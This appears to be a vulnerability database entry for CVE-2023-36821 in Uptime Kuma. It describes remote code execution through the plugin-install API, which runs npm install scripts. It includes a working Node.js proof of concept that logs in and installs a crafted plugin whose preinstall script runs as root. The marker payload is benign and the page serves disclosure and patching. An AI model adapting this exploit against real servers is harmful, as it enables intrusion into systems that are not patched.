8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.2 High
AI Score
Confidence
Low
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
49.7%
Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.
Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.
After downloading a plugin, itās installed by calling npm install
in the installation directory of the plugin:
https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216
Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts
, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.
In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js
and a package.json
containing the script: "preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc"
. This will be executed when installing the plugin.
docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
admin
with password admin123
ā ~ docker exec -it uptime-kuma cat /tmp/poc
cat: /tmp/poc: No such file or directory
poc.js
with the following content:SERVER = "ws://localhost:3001";
USERNAME = "admin";
PASSWORD = "admin123";
const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";
socket.emit(
"login",
{ username: USERNAME, password: PASSWORD, token: "" },
(res) => {
if (res.ok !== true) return console.log("Login failed");
console.log("Login successful");
socket.emit("installPlugin", repo, name, () => {
console.log("Done");
socket.close();
});
}
);
socket.io-client
: npm install socket.io-client
node poc.js
:# node poc.js
Login successful
Done
ā ~ docker exec -it uptime-kuma cat /tmp/poc
Malicious code could have been executed as user root
This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.
CPE | Name | Operator | Version |
---|---|---|---|
uptime-kuma | le | 1.22.0 |
github.com/advisories/GHSA-7grx-f945-mj96
github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216
github.com/louislam/uptime-kuma/commit/a0736e04b2838aae198c2110db244eab6f87757b
github.com/louislam/uptime-kuma/pull/3346
github.com/louislam/uptime-kuma/releases/tag/1.22.1
github.com/louislam/uptime-kuma/security/advisories/GHSA-7grx-f945-mj96
nvd.nist.gov/vuln/detail/CVE-2023-36821
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.2 High
AI Score
Confidence
Low
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
49.7%